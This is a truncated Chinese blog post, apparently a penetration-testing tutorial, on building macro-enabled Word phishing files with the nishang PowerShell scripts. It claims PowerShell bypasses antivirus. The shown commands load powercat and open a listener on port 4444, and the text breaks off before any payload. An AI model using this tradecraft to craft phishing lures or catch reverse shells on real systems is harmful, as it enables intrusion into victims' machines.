Evi1cg2015/09/11 16:40 0x00 简介 Powershell是windows下面非常强大的命令行工具，并且在windows中Powershell可以利用.NET Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。 除此之外，使用powershell能很好的bypass各种AV，在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。 0x01制作word钓鱼文件 下载powercat （powershell的nc） 加载powercat ： PS G:/github/Pentest/powershell/powercat-master> . ./powercat.ps1 PS G:/github/Pentest/powershell/powercat-master> powercat You must select either client mode (-c) or listen mode (-l). 加载以后使用powercat开启监听： PS G:/github/Pentest/powershell/powercat-master> powercat -l -v -p 4444 详细信息: Set Stream 1: TCP 详细信息: Set Stream 2: Console 详细信息: Setting up Stream 1... […]

您可能也喜欢：
Nutanix 4.0 PowerShell goes GA (myvirtualcloud.net)	Google BigQuery API Client Sample Code for C#.NET	Skype announces plan to discontinue support for older versions of Mac client	PowerTip: Use PowerShell to List Firewall Rules	Install DroidCam (Wireless Android Webcam) Client In Ubuntu Via PPA
无觅